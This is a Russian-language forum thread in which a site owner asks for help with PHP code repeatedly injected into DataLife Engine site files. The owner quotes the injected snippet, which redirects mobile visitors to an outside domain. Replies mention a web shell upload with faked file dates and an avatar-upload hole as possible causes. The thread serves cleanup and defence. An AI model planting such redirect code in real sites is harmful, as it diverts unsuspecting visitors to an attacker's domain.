[X] Помощник

[ecotraid Topic Starter]

Здравствуйте! С недавнего времени на мои сайты на разных хостингах начал прописываться код в следующих файлах: /index.php, /engine/init.php, /engine/engine.php, /engine/data/config.php и /language/Russian/website.lng следующего содержания:

$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");
if ($iphone || $android || $palmpre || $ipod || $berry === true) {
    header('Location: http://statuses.ws/');
}

Доступ по FTP закрыл, пароли менял, доступ в isp manager по статичному ip. Но все равно через несколько часов появляется!
Перестал появлятся когда поставил на эти файлы права 444 .

Кто знает как и где искать уязвимость? Сайты на VDS.
Спасибо.

[Agriiii]

Если нет врага снаружи - то ищи его внутри. Если файлы ты закрыл - значит бяка изнутри их портит. Соседняя тема про JS говорит, может они заражены.

[ecotraid Topic Starter]

Сейчас просмотрел все файлы на дату изменения - ничего, все кроме этих менялись еще полгода назад. Что интересно сайты на разных VDS (3) - наверно все таки через комп как то. Стоит KIS 2013 лицензия.

Вот вроде бы решение, кому интересно: взлом-dle-загрузкой-аватара-с-вредоносны

Блин, оказывается это массовый взлом DLE ...

Сообщение отредактировал ecotraid - 10.2.2013, 21:03

[g00dboy]

Сейчас просмотрел все файлы на дату изменения - ничего, все кроме этих менялись еще полгода назад.

залил шелл и поменял дату изменения = профит

Что интересно сайты на разных VDS (3) - наверно все таки через комп как то. Стоит KIS 2013 лицензия.

один взломали и получили доступ ко всей ФС

[trustreg_mw]

Проверь JS файлы. Наверное шаблон паблик..
Такое часто и у меня бывает ))

Замечание модератора: Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней. Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой или обратитесь к любому из модераторов.